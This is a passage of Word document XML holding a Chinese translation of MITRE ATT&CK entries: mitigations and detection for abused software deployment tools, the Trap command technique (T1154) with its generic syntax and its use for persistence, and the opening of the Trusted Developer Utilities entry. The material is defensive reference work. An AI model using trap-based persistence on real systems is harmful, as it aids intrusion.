                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>远程数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>存储</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E95367B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果可以将应用部署系统配置为仅部署已签名的二进制文件，请确保受信任的签名证书与应用部署系统位于不同位置，受信任的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>签名证书</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>位于无法远程访问或远程访问控制很严格的系统上。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0C856DCE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF7F09D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>软件更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D6B90A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期给部署系统打补丁，防止攻击者利用权限升级进行远程访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="67D9F3A1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D24203" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>账号管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3B668D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保第三方提供商用于访问这些系统的任何账号都可以追溯到第三方，并且不会在整个网络中使用，也不会在同一环境中被其他第三方提供商使用。确保定期审查为这些系统配置的账号以保证持续</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>业务</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>需求</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，并确保有措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>跟踪不再需要的访问的取消。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3D724EEC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F646179" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FC2DB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对部署系统的使用有严格的审批策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="654A893A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777F5992" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C3EA2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测方法因第三方软件或系统的类型以及它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用方式而异。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BABC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与对待其他潜在的恶意活动（最初不知道分发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>媒介</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但最终活动遵循可识别的模式）一样，这里也可以应用相同的调查过程。分析流程执行树、来自第三方应用的历史活动（例如通常推送哪些类型的文件）以及推送</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>到系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本引发的活动或事件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A1D42" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，这些第三方应用都有自己的日志，可以收集这些日志并与环境中的其他数据关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77611B47" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核软件部署日志并查找可疑或未经授权的活动。一个通常不用于将软件推送到客户端的系统突然被用于已知管理功能之外的此类任务可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63607CBC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定期执行应用部署，那么不定期的部署活动就会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>凸显出来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知良好软件不相关的过程活动。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署系统上的账号登录活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2193" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008411D6">
        <w:t>Trap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B82704" w14:paraId="47C47167" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="587ABFBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t>: T1154</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781AD6D4" w14:textId="6C507DFC" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行，</w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B0780E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FA806F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791E09DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106DB144" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程支持</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t>No</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B363DEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF22D66" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="563F63F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EAFBFB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>trap</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令允许程序和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定在接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中断信号时将执行的命令。一种常见的情况是脚本允许正常终止和处理常见的键盘中断，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ctrl+c</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ctrl+d</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A007EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用它来注册当</w:t>
      </w:r>
      <w:r w:rsidRPr="00A007EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00A007EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到特定中断以执行或作为持久性机制时要执行的代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trap</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的格式如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>trap 'command list' signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在接收到“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”时执行“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>command list</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13963">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1B2AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC0D000" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单</w:t>
      </w:r>
      <w:r>
        <w:t>地</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过预防性控制缓解，因为它基于系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF83D1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D1BFC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须注册</w:t>
      </w:r>
      <w:r>
        <w:t>成为</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>脚本或者程序，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:t>他们都出现在文件中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或过于宽泛的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE547F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令文件可以缩小调查期间的可疑行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听在</w:t>
      </w:r>
      <w:r>
        <w:t>trap</w:t>
      </w:r>
      <w:r>
        <w:t>中继</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r>
        <w:t>进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723770F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可信的开发工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="586ED31C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F53BBF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1127</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0201F904" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20BAADC7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
